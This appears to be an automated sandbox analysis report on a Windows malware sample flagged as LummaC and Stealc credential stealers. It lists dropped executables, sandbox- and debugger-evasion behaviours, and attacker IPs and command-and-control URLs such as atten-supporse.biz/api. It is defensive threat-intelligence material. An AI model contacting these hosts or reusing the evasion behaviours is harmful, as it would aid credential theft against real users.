Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Directory queried: C:\Users\user\Documents\ZTGJILHXQB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Directory queried: C:\Users\user\Documents\ZTGJILHXQB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: a6f0d09f38.exe PID: 7620, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: 0000000F.00000003.2670852779.0000000001953000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6e1fbaaba5.exe PID: 7984, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: a6f0d09f38.exe PID: 7620, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 0000000E.00000002.2641325721.00000000002C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2600123548.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: b5da647ae3.exe PID: 5500, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565518 Sample: file.exe Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 72 youtube.com 2->72 74 youtube-ui.l.google.com 2->74 76 31 other IPs or domains 2->76 98 Suricata IDS alerts for network traffic 2->98 100 Found malware configuration 2->100 102 Antivirus detection for URL or domain 2->102 104 20 other signatures 2->104 9 skotes.exe 4 34 2->9         started        14 file.exe 5 2->14         started        16 skotes.exe 2->16         started        18 firefox.exe 2->18         started        signatures3 process4 dnsIp5 92 185.215.113.43, 49753, 49759, 49780 WHOLESALECONNECTIONSNL Portugal 9->92 94 185.215.113.16, 49782, 49800, 49822 WHOLESALECONNECTIONSNL Portugal 9->94 96 31.41.244.11, 49765, 49892, 80 AEROEXPRESS-ASRU Russian Federation 9->96 60 C:\Users\user\AppData\...\98a7b9f337.exe, PE32 9->60 dropped 62 C:\Users\user\AppData\...\8b82d73f70.exe, PE32 9->62 dropped 64 C:\Users\user\AppData\...\6e1fbaaba5.exe, PE32 9->64 dropped 70 9 other malicious files 9->70 dropped 132 Creates multiple autostart registry keys 9->132 134 Hides threads from debuggers 9->134 136 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->136 20 a6f0d09f38.exe 9->20         started        24 8b82d73f70.exe 9->24         started        26 98a7b9f337.exe 9->26         started        32 3 other processes 9->32 66 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->66 dropped 68 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->68 dropped 138 Detected unpacking (changes PE section rights) 14->138 140 Tries to evade debugger and weak emulator (self modifying code) 14->140 142 Tries to detect virtualization through RDTSC time measurements 14->142 28 skotes.exe 14->28         started        144 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->144 30 firefox.exe 18->30         started        file6 signatures7 process8 dnsIp9 78 atten-supporse.biz 104.21.16.9, 443, 49797, 49803 CLOUDFLARENETUS United States 20->78 80 home.twentykx20pt.top 20->80 106 Antivirus detection for dropped file 20->106 108 Multi AV Scanner detection for dropped file 20->108 110 Detected unpacking (changes PE section rights) 20->110 124 3 other signatures 20->124 112 Machine Learning detection for dropped file 24->112 114 Modifies windows update settings 24->114 126 3 other signatures 24->126 82 httpbin.org 18.208.8.205 AMAZON-AESUS United States 26->82 116 Tries to detect sandboxes and other dynamic analysis tools (window names) 26->116 118 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 26->118 120 Tries to evade debugger and weak emulator (self modifying code) 26->120 128 3 other signatures 28->128 84 youtube.com 142.250.181.78, 443, 49862, 49863 GOOGLEUS United States 30->84 86 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82, 49865, 49881, 49882 GOOGLEUS United States 30->86 90 8 other IPs or domains 30->90 34 firefox.exe 30->34         started        36 firefox.exe 30->36         started        38 firefox.exe 30->38         started        88 185.215.113.206, 49816, 80 WHOLESALECONNECTIONSNL Portugal 32->88 122 Binary is likely a compiled AutoIt script file 32->122 130 2 other signatures 32->130 40 AppLaunch.exe 2 32->40         started        42 taskkill.exe 32->42         started        44 taskkill.exe 32->44         started        46 4 other processes 32->46 signatures10 process11 process12 48 WerFault.exe 4 40->48         started        50 conhost.exe 42->50         started        52 conhost.exe 44->52         started        54 conhost.exe 46->54         started        56 conhost.exe 46->56         started        58 conhost.exe 46->58         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
34.149.100.209
 prod.remote-settings.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
34.107.243.93
 push.services.mozilla.com United States
15169 GOOGLEUS false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
18.208.8.205
 httpbin.org United States
14618 AMAZON-AESUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
104.21.16.9
 atten-supporse.biz United States
13335 CLOUDFLARENETUS false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
142.250.181.78
 youtube.com United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
34.120.208.123
 telemetry-incoming.r53-2.services.mozilla.com United States
15169 GOOGLEUS false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
star-mini.c10r.facebook.com 157.240.195.35 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
twitter.com 104.244.42.129 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
dyna.wikimedia.org 185.15.58.224 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.181.78 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
atten-supporse.biz 104.21.16.9 true
youtube-ui.l.google.com 172.217.19.14 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
reddit.map.fastly.net 151.101.1.140 true
ipv4only.arpa 192.0.0.171 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
push.services.mozilla.com 34.107.243.93 true
home.twentykx20pt.top 34.118.84.150 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
httpbin.org 18.208.8.205 true
www.reddit.com unknown unknown
spocs.getpocket.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
firefox.settings.services.mozilla.com unknown unknown
www.youtube.com unknown unknown
www.facebook.com unknown unknown
detectportal.firefox.com unknown unknown
shavar.services.mozilla.com unknown unknown
www.wikipedia.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    https://atten-supporse.biz/api false
      		high
      https://httpbin.org/ip false
        		high
        https://atten-supporse.biz:443/api false
          		high